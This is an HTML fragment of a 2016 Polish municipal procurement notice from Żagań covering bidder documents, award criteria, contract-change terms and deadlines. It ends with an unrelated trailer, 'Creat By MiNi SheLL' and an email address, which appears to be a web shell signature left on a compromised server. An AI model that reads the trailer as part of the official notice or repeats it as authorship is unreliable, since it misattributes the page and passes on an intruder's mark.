</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo- w zakresie określonym w SIWZ- jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres Gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w  stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie  :

1. Zmiany  zakresu świadczenia w przypadku - rezygnacji z wykonania części przedmiotu umowy - wykonawcy z tego tytułu nie przysługują żadne roszczenia, w tym prawo do odszkodowania.

2. Zmiany w dokumentacji projektowej- wystąpiła konieczność usunięcia wad lub wprowadzenia zmian w dokumentacji projektowej. Nie usunięcie wad lub nie wprowadzenie zmian w dokumentacji projektowej zagraża prawidłowości  wykonania przedmiotu zamówienia. 
Strona inicjująca konieczność  zmiany  w dokumentacji projektowej  przedstawia projekt zamienny zawierający opis proponowanych zmian.

3. Zmiany terminu wykonania przedmiotu umowy lub jej części, przy czym zmiana spowodowana może być okolicznościami leżącymi wyłącznie po stronie zamawiającego lub okolicznościami niezależnymi zarówno od zamawiającego jak i od wykonawcy skutkującymi koniecznością przedłużenia terminu wykonania przedmiotu umowy, w przypadku:
- nieterminowego przekazania przez Zamawiającego terenu budowy, 
- opóźnienia w dokonywaniu odbiorów z przyczyn leżących po stronie Zamawiającego,
- wystąpienia konieczności usunięcia wad lub wprowadzenia zmian w dokumentacji projektowej, jeżeli usunięcia wad lub konieczność wprowadzenia zmian w dokumentacji projektowej ma wpływ na termin wykonania umowy, 
- konieczności zlecenia wykonania zamówienia dodatkowego na podstawie art. 67 ust.1 pkt.5 ustawy Pzp, którego wykonanie ma wpływ na zmianę terminu realizacji robót objętych niniejszą umową, 
- gdy Zamawiający poleci wykonawcy przerwanie wykonywania przedmiotu umowy (nie wynikające z winy wykonawcy), 
- wykopalisk archeologicznych, niewypałów lub niewybuchów, 
- niesprzyjających warunków atmosferycznych, nietypowych dla danej pory roku, uniemożliwiających wykonywanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów,
- wstrzymania prowadzonych robót poprzez akty władzy i administracji publicznej o ile żądanie lub nakaz nie nastąpił z winy wykonawcy.

3a. Warunki tej zmiany :   wpis w dzienniku budowy inspektora nadzoru inwestorskiego lub przedstawiciela zamawiającego o braku możliwości prowadzenia robót budowlanych ze wskazaniem przyczyn uniemożliwiających ich prowadzenie.
3b. Okres przesunięcia terminu zakończenia  równy będzie okresowi przerwy lub przestoju; 

4.  Zmiany wynagrodzenia  ryczałtowego Wykonawcy, w przypadku: 
- ustawowej zmiany stawki podatku VAT, 
- rezygnacji z części robót, o wartość robót, które nie zostaną wykonane, zlecenia wykonania robót zamiennych będących następstwem usunięcia wad lub wprowadzenia zmian w dokumentacji projektowej, o różnicę pomiędzy wartością robót zamiennych a wartością robót, które nie będą wykonywane, podstawę do obliczenia kosztów zmiany mającej wpływ na wynagrodzenia wykonawcy stanowić będzie zatwierdzony przez zamawiającego kosztorys opracowany na podstawie cen jednostkowych lub danych wyjściowych do kosztorysowania przyjętych do kosztorysu ofertowego wykonawcy. 
Wykonawca przyjmie ceny materiałów wg cen zakupu i pracy sprzętu wg faktycznie poniesionych kosztów lecz nie wyższe niż średnie ceny materiałów i pracy sprzętu wg SEKOCENBUDU dla rejonu lubuskiego, dla kwartału poprzedzającego kwartał, w którym wykonywane są roboty.

5. Zmiana  w zakresie podwykonawstwa: 
- w zakresie zmiany lub rezygnacji z podwykonawcy :na którego zasoby Wykonawca    powoływał się w celu wykazania spełnienia warunków  udziału w postepowaniu, lub z którym zawarto umowę o podwykonawstwo w trakcie realizacji zamówienia publicznego,   pod warunkiem, że Wykonawca  wykaże, iż proponowany inny podwykonawca spełni warunki udziału w  postepowaniu w stopniu nie mniejszym niż wymagany w trakcie postepowania o udzielenie zamówienia; lub  Wykonawca  wykaże,  iż samodzielnie spełni warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postpowania o udzielenie zamówienia; 
- w zakresie  zmiany wskazanych w ofercie części  lub wprowadzenia nowych części przedmiotu umowy, które będą realizowane przy udziale podwykonawców.

6. Zmiany w zakresie personelu Wykonawcy : 

1) Zamawiający może żądać zmiany osoby pełniącej funkcję kierownika budowy oraz kierownika robót jeżeli uzna, że osoba ta nie wykonuje należycie swoich obowiązków. Wykonawca zobowiązany jest zmienić wskazaną osobę na inną spełniającą wymagania określone przez Zamawiającego w SIWZ  w terminie 7 dni od dnia otrzymania żądania Zamawiającego; 

2) Zmiana osoby pełniącej funkcję kierownika budowy oraz kierownika robót może nastąpić poprzez pisemne oświadczenie złożone drugiej stronie. Zmiana taka nie wymaga do swojej ważności formy aneksu do niniejszej umowy. Zmiana osoby pełniącej w/w funkcje następuje poprzez pisemne powiadomienie zamawiającego, do którego dołącza się dokumenty potwierdzające określone w SIWZ  wymagania stawiane dla tej osoby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl; www.bip.zagan.pl                zakladka przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy w Urzędzie Miasta Żagań, ul. Jana Pawła II nr 15 , w pokoju nr 20 w Wydziale Zamówień Publicznych i Nadzoru Właścicielskiego, 68-100 Żagań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2016 godzina 11:00, miejsce: Urząd Miasta Żagań, ul. Jana Pawła II nr 15 ,  pokój  nr 20 w Wydziale Zamówień Publicznych i Nadzoru Właścicielskiego, 68-100 Żagań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com